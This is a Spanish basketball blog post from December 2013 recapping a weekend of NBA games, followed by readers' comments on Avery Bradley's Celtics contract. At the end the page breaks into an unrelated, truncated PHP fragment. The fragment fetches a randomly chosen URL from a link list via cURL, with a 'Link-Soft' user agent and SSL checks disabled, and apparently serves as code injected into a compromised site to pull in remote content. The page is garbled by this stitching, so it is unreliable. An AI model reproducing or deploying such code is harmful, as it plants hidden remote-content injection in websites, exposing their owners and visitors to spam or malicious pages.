Informe del fin de semana: Blazers, Spurs y Thunder siguen on fire

16 de December de 2013 por txusma

Comenzamos con la tormenta de partidos del viernes noche.

En el Este hubo mucha más dosis de emoción de la que esperábamos. Los Pacers sufrieron más de la cuenta ante Charlotte en el peor partido de este curso de Paul George. Horford, otro de los grandes damnificados en el recuento provisional del all-star, redondeaba con un buzzer-beater en la prórroga una sensacional actuación ante Washington y Mike Dunleavy le endosaba otra derrota a los Bucks con un triple en el último instante. Los Celtics le ganaban por segunda vez esta semana a los Knicks, pero con un resultado mucho más ajustado y también sufrían los Pistons para derrotar a los Nets a pesar de que Drummond aprovechó bien la baja de López. No parecen notar los Raptors la ausencia de Gay y DeRozan acribillaba a los Sixers con 27 puntos. Por último los Cavs ganaban en Orlando, como nos comentaba el compañero Ekos:

“Parece que Irving se enchufa… Otro partido más por encima de los 30 puntos y victoria, muy bien Waiters también.”

En el Oeste resulta extraño que nadie comentara el partidazo de Kevin Love, que no sirvió para ganar en San Antonio, o la importantísima victoria de Houston en Oakland. Eso sí, comentamos largo y tendido el ridículo que hicieron los Lakers en Oklahoma y concretamente la apatía de Pau Gasol, como él mismo reconoció. Al parecer el rol que desempeña no le motiva lo suficiente como para aportar agresividad. Postura muy difícil de entender y que puede provocar que los Lakers se muevan con el español como moneda de cambio.

También hay que mencionar el extraordinario tándem que forman Dragic y Bledsoe, que les dio una nueva victoria sobre Sacramento, y la positiva imagen que últimamente nos van transmitiendo los Jazz, ganando a todo un equipo de playoffs como Denver en su propia casa. A destacar también el gran partido de Eric Gordon para sumar la victoria ante Grizzlies. 

Del sábado podemos prácticamente fusilar la crónica que nos brindó Denise:

“Primera victoria de Lakers con Kobe. (…) los Bobcats ganaban de 6 a falta de 3 minutos y a partir de ahí encajan un parcial de 9-0 que les hace perder el partido.”
“Duelo de bases entre el mejor del mundo actualmente Paul y el que podría llegar a serlo próximamente, Wall. El primero acabó con 38-12, 11 de 14 en tiros y llevandose la victoria.”
“Les costó a los Heat doblegar a unos peleones Cavs donde a parte de los habituales Irving y Waiters, brilló Earl Clark”
“Victoria balsámica de unos Knicks donde entre Melo y Bargnani se combinaron para anotar 58 puntos. Los Hawks no lo pusieron nada fácil.”
“Los Raptors masacraron a unos Bulls psicologicamente hundidos. (…) Pero para paliza la de Blazers a los 76ers en una orgía de puntos para los de Oregón (105-139) , acabando con 8 tios en dobles digitos y 21 triples convertidos.”
“Victoria abultada de unos Mavs sin Nowitzki ante una banda como la de los Bucks, probablemente el equipo mas aburrido de la NBA. (…) Y los Spurs no se despeinaron mucho para vencer a los débiles Jazz.”

Nada más que añadir. Esperemos que Denise nos perdone…

De los partidos de ayer, destacar el paso firme con el que siguen Blazers y Thunder aunque ayer tuvieron que sudar para doblegar a Pistons y Magic, respectivamente. Detroit llegó a ganar de 13 puntos a principios del último cuarto de la mano de Josh Smith pero no fueron capaces de aguantar la ventaja y Portland forzó la prórroga. En ella, un hasta el momento no muy acertado Damian Lillard, silenció Auburn Hills con la canasta de la victoria. Oklahoma consiguió su 12ª victoria seguida en casa pero a punto estuvo de tirar por la borda el trabajo de todo el partido tras desperdiciar una ventaja de 16 puntos en los últimos 6 minutos.

Los que no pasan un buen momento son los Warriors. Iguodala no vuelve a pesar de que “cada día está mejor” y Stephen Curry sigue jugando minutadas. La capacidad ofensiva de Dragic y Bledsoe y la buena defensa de Miles Plumlee marcaron la diferencia para que los Suns se llevaran el partido. Memphis tampoco lo está pasando bien y espera la vuelta de Marc Gasol como agua de mayo. Sin él en la pista Kevin Love se dio un festín. Ya desde el primer cuarto los Wolves se escaparon y los Grizzlies no pudieron ponerles en apuros en ningún momento. Los Nuggets se resarcieron de su derrota frente a Utah con una victoria ante los Pelicans con JJ Hickson recordando al del año pasado en Portland y, finalmente, debut de ensueño para Rudy Gay en el Sleep Train Arena de Sacramento como local. 26 puntos y lo que es más importante, victoria ante los Rockets. Los visitantes no estuvieron muy acertados durante toda la noche y perdieron casi toda posibilidad de victoria con la lesión de James Harden a principios del tercer cuarto. “The beard” tuvo que retirarse tras sufrir un esguince tobillo pero antes tiró un par de tiros libres a la pata coja. Y los metió.

Comenta

4 comentarios a esta entrada

  1. Denise dice:
    #1

    Avery Bradley renovado por Celtics por 30 millones en los proximos 4 años. ¿Significa esto que van a traspasar a Rondo? Aunque el bueno de Bradley de playmaker tiene poco, juega de base porque mide menos de 1’90 porque su visión de juego es nula.

      Citar

  2. Jose Luis dice:
    #2

    Ostia lo veo caro.

    5 al año hubiera ido bien.

      Citar

  3. Vader dice:
    #3

    Creo que más que Bradley es Crawford el que esta haciendo de base (y muy bien por cierto). No me extrañaria que traspasaran a Rondo si con ello consiguen buenas rondas y/o quitarse contratos toxicos como Wallace o Humpries. Pero no veo que tenga relación esta renovación con la posible salida de Rondo.

    Saludos

      Citar

  4. franitis dice:
    #4

    Me cambio de equipo si pasa eso…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>